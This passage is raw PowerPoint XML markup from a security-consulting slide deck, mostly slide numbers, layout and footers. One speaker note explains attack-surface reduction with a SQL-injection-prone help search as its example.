            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3266945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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2982025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8DFCC3-1396-4149-804D-E2EF5E2141A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3846309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8DFCC3-1396-4149-804D-E2EF5E2141A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2745634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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1613629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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3481590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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308974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8DFCC3-1396-4149-804D-E2EF5E2141A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3756426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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1820422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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1928653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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231508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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1593359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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1507758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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2429837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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396731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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2579820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 a web application implements online help with a search function. The search function may be vulnerable to SQL injection attacks. If the help feature was limited to authorized users, the attack likelihood is reduced. If the help feature’s search function was gated through centralized data validation routines, the ability to perform SQL injection is dramatically reduced. However, if the help feature was re-written to eliminate the search function (through better user interface, for example), this almost eliminates the attack surface area, even if the help feature was available to the Internet at large. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142113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8DFCC3-1396-4149-804D-E2EF5E2141A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1213673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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2304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30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0EBEC8-8098-4323-B002-99F0C88984A3}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178846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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2304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30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0EBEC8-8098-4323-B002-99F0C88984A3}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1638341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8DFCC3-1396-4149-804D-E2EF5E2141A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100171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8DFCC3-1396-4149-804D-E2EF5E2141A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272950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8DFCC3-1396-4149-804D-E2EF5E2141A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="629439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14" descr="bg1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2019300"/>
            <a:ext cx="9144000" cy="3238500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 7" descr="logo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="341314"/>
            <a:ext cx="2286000" cy="533616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 8" descr="circle-logo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4983163" y="1447800"/>
            <a:ext cx="3551237" cy="3805238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6437313"/>
            <a:ext cx="3455988" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © Aujas Networks Pvt. Ltd. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2130425"/>
            <a:ext cx="4419600" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">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21" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="4495800" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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8" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6529388" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0C99C39D-954C-4D7C-8FDD-C1557A7EFBB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inside_top"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 7" descr="inside_bottom"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-1588" y="6332538"/>
            <a:ext cx="9144001" cy="525462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6564313"/>
            <a:ext cx="3455988" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © Aujas Networks Pvt. Ltd. All rights reserved.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="23750"/>
            <a:ext cx="6099048" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="20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135563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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3124200" y="6499225"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="6261100"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B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inside_bottom"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-1588" y="6332538"/>
            <a:ext cx="9144001" cy="525462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 7" descr="inside_top"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6564313"/>
            <a:ext cx="3455988" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © Aujas Networks Pvt. Ltd. All rights reserved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="23750"/>
            <a:ext cx="6096000" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="20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990600"/>
            <a:ext cx="4038600" cy="51355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90600"/>
            <a:ext cx="4038600" cy="51355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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6499225"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aujas Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6470650" y="6261100"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{40540A7A-F689-4641-A681-982FD4E7209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descr="inside_bottom"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-1588" y="6332538"/>
            <a:ext cx="9144001" cy="525462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="inside_top"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6564313"/>
            <a:ext cx="3455988" cy="246062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
